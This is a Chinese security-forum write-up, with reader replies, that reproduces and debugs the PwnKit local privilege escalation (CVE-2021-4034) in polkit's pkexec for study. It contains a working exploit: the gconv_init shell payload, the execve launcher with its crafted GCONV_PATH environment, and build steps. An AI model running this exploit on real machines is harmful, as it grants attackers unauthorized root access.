首页
社区
课程
招聘
[原创]CVE-2021-4034 pkexec本地提权漏洞复现与原理分析
2022-2-8 21:37 42647

[原创]CVE-2021-4034 pkexec本地提权漏洞复现与原理分析

2022-2-8 21:37
42647

前言

近期爆出了一个影响甚广的本地提权漏洞CVE-2021-4034,诸如Ubuntu、Debian、Fedora和CentOS 等主流Linux操作系统都受到了该漏洞影响。漏洞利用脚本在互联网上已经公开,利用起来异常简单且稳定。在当前的环境下,当攻击者获得目标操作系统一个普通用户权限时,则极大概率可以直接获得root权限,使得权限控制机制形同虚设。
而如此重大的漏洞,起因却仅仅是因为一个名为pkexec的程序对参数个数的判断存在疏忽,造成了一个数组溢出。如何利用一个数组溢出获得root权限呢?怀着这一疑问,本人对公开利用脚本进行了源码调试分析,感慨其利用技巧极具艺术性的同时,将分析过程记录成本篇文章。

感性的认识——漏洞复现

本次的漏洞复现环境为Kali-Linux-2021.2-vmware-amd64,其pkexec版本为0.105,使用普通用户kali进行复现。

下载exp源码并编译(如果目标环境没有gcc,可以在本地编译好了之后再拷贝上去)

1
2
3
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make

测试exp效果,得到了root权限

1
./cve-2021-4034

图片描述

漏洞分析基础环境

操作系统:Kali-Linux-2021.2-vmware-amd64
polkit源码版本:polkit-0.105
gdb配置:
1.设置反汇编风格为intel风格(个人喜好)
2.关闭pwndbg等配置,避免调试时过多的信息造成干扰
3.设置gdb的SUID位,避免调试pkexec时执行到geteuid函数失败,报错“pkexec must be setuid root”

1
chmod 4755 /usr/bin/gdb

图片描述

资源下载
https://src.fedoraproject.org/repo/pkgs/polkit/polkit-0.105.tar.gz/md5/9c29e1b6c214f0bd6f1d4ee303dfaed9/polkit-0.105.tar.gz
https://github.com/berdav/CVE-2021-4034.git

前置知识

argc何时为0

test.c

1
2
3
4
5
6
7
8
9
10
#include<stdio.h>
int main(int argc, char** argv)
{
    printf("argc: %d\n", argc);
    for(int i; i<argc; i++) {
        printf("%s\n", argv[i]);
    }
 
    return 0;
}

学过C语言的朋友都知道,如上代码中,argc表示参数的个数,argv存放着具体的参数,argv[0]指向程序本身,argv[1]指向第一个参数,argv[2]指向第二个参数,...,argv[argc]存放0 表示结束。
图片描述

当我们在命令行中执行程序时,argc的取值至少为1,因为即使不加参数,argv[0]也要指向程序路径本身。pkexec的作者也是这么想的,从而百密一疏,遗留下了一个重大隐患。在特殊情况下,如使用execve来调用程序,并给argv传值 NULL,则argc为0。
execve函数声明

1
2
#include <unistd.h>
int execve(const char *pathname, char *const argv[], char *const envp[]);

execve.c

1
2
3
4
5
6
#include <unistd.h>
 
int main(int argc, char **argv)
{
    return execve("./test", NULL, NULL);
}

图片描述

argv与envp在内存里的布局是连续的

execve.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <unistd.h>
 
int main()
{
    char* const argv[] = {
        "AAAA1111",
        "BBBB2222",
        "CCCC3333",
        NULL
    };
    char* const envp[] = {
        "DDDD3333",
        "EEEE4444",
        "FFFF5555",
        NULL
    };
    return execve("./test", argv, envp);
}

使用execve调用test程序,并分别给argv与envp传递了3个值。

test.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include<stdio.h>
int main(int argc, char** argv)
{
    printf("argc: %d\n", argc);
    for(int i; i<8; i++) {
        if(argv[i]!=NULL) {
            printf("argv[%d]: %s\n", i, argv[i]);
        } else {
            printf("argv[%d]: NULL\n", i);
        }
    }
     
    return 0;
}

argc为3,加上截止符0,argv的大小为4,这里直接打印了8个值,显然是越界了。argv后面的内容是什么呢?
图片描述
通过实验,表明argv与envp在内存布局上是连续的,envp紧跟argv之后。

利用g_printerr 执行命令

main.c

1
2
3
4
5
int main()
{
    g_printerr("Hello world.\n");
    return 0;
}

pwnkit.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
void gconv(void) {
}
 
void gconv_init(void *step)
{
        char * const args[] = { "/bin/sh", "-pi", NULL };
        char * const environ[] = { "PATH=/bin:/usr/bin", NULL };
        execve(args[0], args, environ);
        exit(0);
}

Makefile

1
2
3
4
all:
        echo "module UTF-8// AAAA// pwnkit 1" > gconv-modules
        gcc --shared -fPIC -o pwnkit.so pwnkit.c
        gcc -o test main.c -lglib-2.0

run.sh

1
2
3
4
5
6
#!/bin/bash
 
export CHARSET=AAAA
export GCONV_PATH=.
 
./test

g_printerr 的功能和printf很像,主要就是打印文本。在本实验中,当环境变量设置了CHARSET,且不为UTF-8时,g_printerr会进行编码转换,而转换的方法就是根据GCONV_PATH里的配置文件gconv-modules的说明,调用pwnkit.so,从而得到shell。
图片描述

SUID权限

当一个程序被设置了SUID权限,则其他用户执行该程序时,可以临时切换到程序所有者的权限去执行一些功能。因为涉及到权限变更,所以在执行操作系统自带的此类程序时,往往被要求授权。
pkexec的所有者为root,具有SUID权限,当普通用户kali执行“pkexec bash”命令时会被要求授权。获得授权后,得到了root权限。
图片描述
图片描述

执行具有SUID权限的程序时,不安全的环境变量不会被引入

打印所有环境变量
main.c

1
2
3
4
5
int main()
{
    system("env");
    return 0;
}

使用root用户进行编译,并设置SUID权限

1
2
gcc -g -O0 -o test main.c
chmod 4755 ./test

图片描述
设置环境变量,并通过test程序打印出来,用以判断环境变量的导入情况

run.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/bin/bash
 
export GCONV_PATH=AAAA0001
export GETCONF_DIR=AAAA0002
export HOSTALIASES=AAAA0003
export LD_AUDIT=AAAA0004
export LD_DEBUG=AAAA0005
export LD_DEBUG_OUTPUT=AAAA0006
export LD_DYNAMIC_WEAK=AAAA0007
export LD_HWCAP_MASK=AAAA0008
export LD_LIBRARY_PATH=AAAA0009
export LD_ORIGIN_PATH=AAAA0010
export LD_PRELOAD=AAAA0011
export LD_PROFILE=AAAA0012
export LD_SHOW_AUXV=AAAA0013
export LD_USE_LOAD_BIAS=AAAA0014
export LOCALDOMAIN=AAAA0015
export LOCPATH=AAAA0016
export MALLOC_TRACE=AAAA0017
export NIS_PATH=AAAA0018
export NLSPATH=AAAA0019
export RESOLV_HOST_CONF=AAAA0020
export RES_OPTIONS=AAAA0021
export TMPDIR=AAAA0022
export TZDIR=AAAA0023
 
export PATH=AAAA1001:/usr/bin
export SHELL=AAAA1002
export CHARSET=AAAA1003
export BBBB=AAAA1004
 
./test

分别以root用户和kali用户执行“./run.sh |grep AAAA”,用来判断环境变量的导入情况。
图片描述
图片描述
通过实验可以知道,当以kali用户身份去执行所有者为root且具有SUID权限的程序时,GCONV_PATH、LD_PRELOAD 等不安全的环境变量并不会被引入。

利用原理分析

构建pkexec源码调试环境

下载源码polkit-0.105

https://src.fedoraproject.org/repo/pkgs/polkit/polkit-0.105.tar.gz/md5/9c29e1b6c214f0bd6f1d4ee303dfaed9/polkit-0.105.tar.gz

安装编译环境

1
2
3
4
5
6
apt install automake
apt install autopoint
apt install libtool
apt install gtk-doc-tools
apt install libpam0g-dev
apt install intltool

编译

1
2
./configure (要把-O2换成 -O0,关闭优化,方便调试)
make

设置SUID权限

以root用户赋权

1
2
cd src/programs/.libs
chmod 4755 pkexec

图片描述

修改利用脚本berdav/CVE-2021-4034

修改利用脚本里调用的程序为刚编译好的pkexec,以便源码调试。
cve-2021-4034.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <unistd.h>
 
int main(int argc, char **argv)
{
    char * const args[] = {
        NULL
    };
    char * const environ[] = {
        "pwnkit.so:.",
        "PATH=GCONV_PATH=.",
        "SHELL=/lol/i/do/not/exists",
        "CHARSET=PWNKIT",
        "GIO_USE_VFS=",
        NULL
    };
    return execve("../polkit-0.105/src/programs/.libs/pkexec", args, environ);
}

gdb调试

pkexec的授权认证是如何被绕过的

"./pkexec bash"是正常的用法,会先请求授权,然后再以root权限执行bash命令;而"./cve-2021-4034"会利用漏洞,跳过授权认证,直接以root权限执行命令。授权认证是如何被绕过的呢?
如果能在源码层次记录下两个程序的执行流程,则可以比对出有差异的地方,从而帮助我们理解“授权认证是如何被绕过”这个问题,更直观的理解漏洞利用过程。

gdb源码追踪脚本

step_trace.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import sys
import gdb
import os
import re
 
def in_frames(needle):
    """ Check if the passed frame is still on the current stack """
    hay = gdb.newest_frame()
    while hay:
        if hay == needle:
            return True
        hay = hay.older()
    return False
 
# Use this to reduce any kind of unwanted noise
def filter_step(output):
    output = re.sub(r'^.*No such file or directory\.\n', r'', output, flags=re.M)
    output = re.sub(r'^\d+\s+in\s+.*\n', r'', output, flags=re.M)
    return output
 
def step_trace(filename=None, step="step"):
    counter = 0
    if filename:
        output = ""
    frame = gdb.newest_frame()
    print("Stepping until end of {} @ {}:{}".format(frame.name(), frame.function().symtab, frame.function().line))
    while in_frames(frame):
        counter += 1
        if filename:
            output += filter_step(gdb.execute(step, to_string=True))
        else:
            gdb.execute(step)
 
    if filename:
        with open(filename, "w") as file:
            file.write(output)
    print("Done stepping through {} lines.".format(counter))
1
2
(gdb) source step_trace.py
(gdb) python step_trace(step="next")

step_trace.py是gdb的源码追踪脚本,可以把执行过的代码打印到终端上。其中,step="next" 表示单步步过,step="step" 表示单步步入。

调试"./pkexec bash"

bplist

1
2
3
4
5
6
set follow-fork-mode parent
b main
b /home/kali/software/relase/polkit-0.105/src/programs/pkexec.c:900
r bash
source step_trace.py
python step_trace(step="next")

在pkexec的main函数和调用execv(pkexec.c:900)时下断点,记录中间的源码调用。在调试过程中,可以知道授权弹窗在705行代码polkit_authority_check_authorization_sync处调用。另外,step_trace.py 把源码追踪的结果打印在了终端,可以通过复制的方式另存为gdb_pkexec_bash.log,以便后面的分析。
图片描述
图片描述
图片描述

调试"./cve-2021-4034"

bplist_cve

1
2
3
4
5
6
7
b main
r
c
b /home/kali/software/release/polkit-0.105/src/programs/pkexec.c:900
set follow-fork-mode parent
source /home/kali/software/release/polkit-0.105/src/programs/.libs/step_trace.py
python step_trace(step="next")

源码追踪"./cve-2021-4034"的执行,并把日志记录为gdb_cve-2021-4034.log,以便后面的分析。
图片描述
图片描述

代码流日志比对

图片描述
通过比对代码流日志,可以清晰的看到"./cve-2021-4034"对argc的处理和validate_environment_variable的行为上存在异常,发现这两点异常将十分有助于我们理解漏洞利用过程。"./cve-2021-4034"的代码流程非常的短,其在调用环境变量校验函数validate_environment_variable的时候就获得了shell,这也就解释了为何会绕过授权认证,因为根本就没走到那。

如何获取shell权限的

通过gdb调试,可以打印一些关键变量的值,并给gdb_cve-2021-4034.log加上备注,这样有助于理解漏洞利用过程。

深入调试"./cve-2021-4034"

bp

1
2
3
4
5
b main
r
c
b /home/kali/software/release/polkit-0.105/src/programs/pkexec.c:593
set follow-fork-mode parent
1
gdb ./cve-2021-4034 -x bp

图片描述
由图可知,参数数组与环境变量数组在内存布局上是连续的,本例中,argv[1]即是environ[0]

图片描述
s被赋值为"GCONV_PATH=./pwnkit.so:.",在pkexec程序看来,这只是一个普通的文件路径,而这是攻击者特意构造的,是为了引入不安全的环境变量GCONV_PATH。

图片描述
利用越界写漏洞,成功引入不安全的环境变量GCONV_PATH。

图片描述
构造报错,调用g_printerr,得到shell。

gdb_cve-2021-4034_details.log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Breakpoint 1, main (argc=0, argv=0x7ffe2d2d4e58) at pkexec.c:406
406       const gchar *environment_variables_to_save[] = {
Breakpoint 2 at 0x55d64339bed6: file pkexec.c, line 900.
Stepping until end of main @ pkexec.c:386
442       ret = 127;
443       authority = NULL;
444       subject = NULL;
445       details = NULL;
446       result = NULL;
447       action_id = NULL;
448       saved_env = NULL;
449       path = NULL;
450       command_line = NULL;
451       opt_user = NULL;
452       local_agent_handle = NULL;
455       if (geteuid () != 0)
461       original_user_name = g_strdup (g_get_user_name ());
462       if (original_user_name == NULL)
468       if (getcwd (original_cwd, sizeof (original_cwd)) == NULL)
478       opt_show_help = FALSE;
479       opt_show_version = FALSE;
480       opt_disable_internal_agent = FALSE;
481       for (n = 1; n < (guint) argc; n++)       //n被赋值为1
512       if (opt_show_help)
518       else if (opt_show_version)
525       if (opt_user == NULL)
--Type <RET> for more, q to quit, c to continue without paging--
526         opt_user = g_strdup ("root");
536       g_assert (argv[argc] == NULL);
537       path = g_strdup (argv[n]);                //越界读,path被赋值为 argv[1],即 environ[0],"pwnkit.so:."
538       if (path == NULL)
543       if (path[0] != '/')
546           s = g_find_program_in_path (path);    //在环境变量PATH中寻找"pwnkit.so:.",并把路径返回给 s。利用脚本中把PATH设置为"GCONV_PATH=.",且在磁盘上提前生成了名为"GCONV_PATH=."的文件夹,并放置了名为"pwnkit.so:."的程序,因此,s被赋值 "GCONV_PATH=./pwnkit.so:."
547           if (s == NULL)
552           g_free (path);
553           argv[n] = path = s;                   //越界写,argv[1]被设置为"GCONV_PATH=./pwnkit.so:.",即environ[0] 被修改,重新引入了不安全的环境变量GCONV_PATH,至此完成了至关重要的一步。接下来只要随便构造个错误,使其报错时调用到 g_printerr 即可。
555       if (access (path, F_OK) != 0)
560       command_line = g_strjoinv (" ", argv + n);
561       exec_argv = argv + n;
566       rc = getpwnam_r (opt_user, &pwstruct, pwbuf, sizeof pwbuf, &pw);
567       if (rc == 0 && pw == NULL)
572       else if (pw == NULL)
579       saved_env = g_ptr_array_new ();
580       for (n = 0; environment_variables_to_save[n] != NULL; n++)
582           const gchar *key = environment_variables_to_save[n];
585           value = g_getenv (key);
586           if (value == NULL)
593           if (!validate_environment_variable (key, value))  //key="SHELL", value="/lol/i/do/not/exists",在校验环境变量时报错"The value for the SHELL variable was not found the /etc/shells file",进而调用了 g_printerr ,触发漏洞利用,最终执行pwnkit.so里的execve("/bin/sh", args, environ)得到shell。
process 11852 is executing new program: /usr/bin/dash
Error in re-setting breakpoint 1: Function "main" not defined.
Error in re-setting breakpoint 2: No source file named /home/kali/software/release/polkit-0.105/src/programs/pkexec.c.
#

总结

当使用普通用户权限执行pkexec时,GCONV_PATH、LD_PRELOAD等不安全的环境变量会被删除,但攻击者可以通过参数数组的越界读写漏洞,重新引入不安全的环境变量,进而构造利用链获取root权限。这一漏洞的起因十分简单,危害却十分严重,值得深思。

参考

https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
https://duo.com/decipher/serious-privilege-escalation-flaw-in-linux-component-patched
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
https://stackoverflow.com/questions/39602306/tracing-program-function-execution-on-source-line-level
https://www.xiebruce.top/1387.html
https://bbs.pediy.com/thread-271345.htm

2023年11月29日更新

CVE-2021-4034 pkexec提权漏洞源码调试环境(docker里跑虚拟机,有点小卡,但能接受)

参考了P神的vulhub项目,在docker镜像vulhub/polkit:0.105的基础上部署了gdb、polkit源码,并做了配置和调试。

1
2
3
4
5
6
7
8
9
10
CVE-2021-4034 pkexec提权漏洞源码调试环境
百度网盘链接:https://pan.baidu.com/s/1pf-lk9LrLHSaPzihpMRisQ?pwd=77ac
 
加载docker镜像
docker load -i cve-2021-4034_pkexec_polkit_0.105.tar.gz
 
创建容器
docker run -itd -p 2222:2222 cve-2021-4034_pkexec:polkit_0.105
 
大概等5分钟等环境起来,然后用ssh连接2222端口就好了,账号密码root/toor, ubuntu/toor

"docker logs 容器ID"看到如下内容说明容器启动成功

1
2
3
4
5
6
Ubuntu 20.04 LTS ubuntu ttyS0
 
ubuntu login: [  210.519623] cloud-init[916]: Cloud-init v. 20.1-10-g71af48df-0ubuntu5 running 'modules:config' at Wed, 29 Nov 2023 08:03:40 +0000. Up 20.
218.333218] cloud-init[928]: Cloud-init v. 20.1-10-g71af48df-0ubuntu5 running 'modules:final' at Wed, 29 Nov 2023 08:03:47 +0000. Up 216.73 seconds.
218.349228] cloud-init[928]: Cloud-init v. 20.1-10-g71af48df-0ubuntu5 finished at Wed, 29 Nov 2023 08:03:49 +0000. Datasource DataSourceNoCloud [seed=s
root@ab-virtual-machine:~#

或者"nc 127.0.0.1 2222"看到如下内容也能说明容器启动成功

1
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4

漏洞调试环境的使用

使用ssh以普通用户ubuntu的身份通过2222端口登录系统,进入/home/ubuntu/CVE-2021-4034_pkexec/CVE-2021-4034_exp/目录开始源码调试

1
gdb ./cve-2021-4034 -x bplist_main

图片描述

触发命令执行时的调用栈

1
2
对关键函数下断点
b gconv_init

图片描述

对pkexec漏洞调试环境的一些想法

本来觉得docker环境会不会小一点,看了一下要2个G左右,其实虚拟机做的好的话2个G也能搞定,不过借助docker的话,在内容分发和管理上可能会方便一些。另外,pkexec漏洞利用有些技巧,但抽丝剖茧理解起来并不是太难,感觉至少比堆利用要简单,其知名、典型、不算太老,是个很好的学习素材。

其他内容

docker里跑虚拟机

1
qemu-system-x86_64 -drive "file=ubuntu-20.04-server-cloudimg-amd64.img,format=qcow2" -drive "file=user-data.img,format=raw" -m 2G -nic user,model=virtio,hostfwd=tcp:0.0.0.0:2222-:22 -smp $(nproc) -nographic -monitor null

[培训]《安卓高级研修班(网课)》月薪三万计划

最后于 2023-11-29 17:08 被Jtian编辑 ,原因:
上传的附件:
收藏
点赞9
打赏
分享
最新回复 (24)
雪    币: 16110
活跃值: (5876)
能力值: ( LV13,RANK:861 )
在线值:
发帖
回帖
粉丝
大帅锅 4 2022-2-9 18:49
2
1
$ alias whoami='echo root'
$ export PS1='# '
# whoami
root
雪    币: 78
活跃值: (31)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
wx_七゜_367 2022-2-10 10:43
3
0

师傅您好,逛论坛看到您发的帖子,觉得写得很好,想分享给更多人,未经您的允许已经发到我的公众号上“每天一个入狱小技巧”,表示抱歉。已注明出处,如不同意请回复,我会立即删帖,谢谢

最后于 2022-2-10 11:14 被wx_七゜_367编辑 ,原因: 写错了
雪    币: 1719
活跃值: (3533)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
Jtian 1 2022-2-10 11:35
4
0
wx_七゜_367 师傅您好,逛论坛看到您发的帖子,觉得写得很好,想分享给更多人,未经您的允许已经发到我的公众号上“每天一个入狱小技巧”,表示抱歉。已注明出处,如不同意请回复,我会立即删帖,谢谢
可以的,注明出处就好
雪    币: 78
活跃值: (31)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
wx_七゜_367 2022-2-10 14:06
5
0
Jtian 可以的,注明出处就好
好的 谢谢师傅
雪    币: 5916
活跃值: (661)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
鸿渐之翼 2022-2-10 18:17
6
0
大侠,附件链接挂了
雪    币: 1719
活跃值: (3533)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
Jtian 1 2022-2-10 18:54
7
0
鸿渐之翼 大侠,附件链接挂了
看了下,附件没挂呀。直接点击链接开始下载,不要右键再下载。
雪    币: 186
活跃值: (283)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
h0pε 2022-2-12 01:11
8
0
感谢分享
雪    币: 186
活跃值: (283)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
h0pε 2022-2-12 22:18
9
0
师傅请问代码流日志比对使用的是什么软件?
雪    币: 65
活跃值: (540)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
jren 2022-2-13 23:59
10
0
h0pε 师傅请问代码流日志比对使用的是什么软件?

Beyond Compare,截图的标题栏上可以看出来

最后于 2022-2-14 00:08 被jren编辑 ,原因:
雪    币: 186
活跃值: (283)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
h0pε 2022-2-14 11:41
11
0
jren h0pε 师傅请问代码流日志比对使用的是什么软件? Beyond&nbsp;Compare,截图的标题栏上可以看出来
感谢
雪    币: 5916
活跃值: (661)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
鸿渐之翼 2022-2-14 13:58
12
0
感谢大侠,已成功调试。
雪    币: 213
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
菜鸟学IoT 2022-2-15 16:28
13
0
感谢分享,正准备分析
雪    币: 213
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
菜鸟学IoT 2022-2-17 10:20
14
0
step_trace.py gdb脚本调试的时候有问题,怎么解决?

  File "step_trace.py", line 26, in step_trace
    print("Stepping until end of {} @ {}:{}".format(frame.name(), frame.function().symtab, frame.function().line))
AttributeError: 'NoneType' object has no attribute 'symtab'
雪    币: 65
活跃值: (540)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
jren 2022-2-17 17:16
15
0
菜鸟学IoT step_trace.py gdb脚本调试的时候有问题,怎么解决?  File "step_trace.py", line 26, in step_trace    p ...

你可以通过调试的方法来排查问题
import pdb
pdb.set_trace()


https://blog.csdn.net/qq_27825451/article/details/85600992

最后于 2022-2-17 17:18 被jren编辑 ,原因:
雪    币:
活跃值: (267)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Squirre17 2022-3-2 15:14
16
0
师傅,请问p_printerr是不需要包含头文件的吗?这边编译似乎没法通过。。。试着去include找了一下也没找到合适的头文件
雪    币: 1719
活跃值: (3533)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
Jtian 1 2022-3-2 16:32
17
0
Squirre17 师傅,请问p_printerr是不需要包含头文件的吗?这边编译似乎没法通过。。。试着去include找了一下也没找到合适的头文件
是 g_printerr。
雪    币: 1719
活跃值: (3533)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
Jtian 1 2022-3-2 16:37
18
0
Squirre17 师傅,请问p_printerr是不需要包含头文件的吗?这边编译似乎没法通过。。。试着去include找了一下也没找到合适的头文件
我这里并没有报错,只产生了一个告警,文章截图里有显示。你可以确认下编译环境是否一致、依赖库是否安装。
雪    币:
活跃值: (267)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Squirre17 2022-3-2 20:22
19
0
Jtian 我这里并没有报错,只产生了一个告警,文章截图里有显示。你可以确认下编译环境是否一致、依赖库是否安装。
这里我打错了,但是自己本地没打错,依赖库glib-2.0也装了还是不行,只能手动调iconv来执行了
雪    币: 379
活跃值: (394)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
wsljk 2022-3-30 01:00
20
0
大佬总结好呀
雪    币: 1767
活跃值: (3990)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Grav1ty 2022-5-17 21:40
21
0
好帖,回过头再看一遍又有了新的收获,顶!
雪    币: 200
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
b1cc 2022-12-23 18:27
22
0

大佬,我在 ubuntu 16.04 复现的时候出现个问题,我使用 gdb ./pkexec 调试的时候,r 运行之后会出现以下报错:
Cannot exec  -c exec /home/b1/pkexec bash.
Error: No such file or directory
During startup program exited with code 127.

然后尝试使用 sudo 启动 gdb后不存在这个问题,我换到 ubuntu20.04 也不存在这个问题。请教一下您是否知道具体原因是什么?

最后于 2022-12-23 18:37 被b1cc编辑 ,原因:
雪    币: 1719
活跃值: (3533)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
Jtian 1 2022-12-24 17:28
23
0
b1cc 大佬,我在&nbsp;ubuntu&nbsp;16.04&nbsp;复现的时候出现个问题,我使用&nbsp;gdb&nbsp;./pkexec&nbsp ...
看报错原因,说是文件不存在,你可以在命令行里手动执行确认一下。
另外,如果是相对路径的文件,还要确认下当前工作路径与环境变量。
雪    币: 3842
活跃值: (1824)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
音货得福 1 2022-12-27 11:10
24
0
cool, 还能这样提权, 学习了. 写的很细, 我个人觉得如果稍微调整下顺序感觉观感会更好, 先写提权成因, 源码分析它触发路径, 后面再上调试分析, 会更清晰明了吧
雪    币: 1719
活跃值: (3533)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
Jtian 1 2023-11-29 17:03
25
0
Jtian 看报错原因,说是文件不存在,你可以在命令行里手动执行确认一下。 另外,如果是相对路径的文件,还要确认下当前工作路径与环境变量。

要不试试我的环境?

CVE-2021-4034 pkexec提权漏洞源码调试环境

百度网盘链接:https://pan.baidu.com/s/1pf-lk9LrLHSaPzihpMRisQ?pwd=77ac


最后于 2023-11-29 17:04 被Jtian编辑 ,原因:
游客
登录 | 注册 方可回帖
返回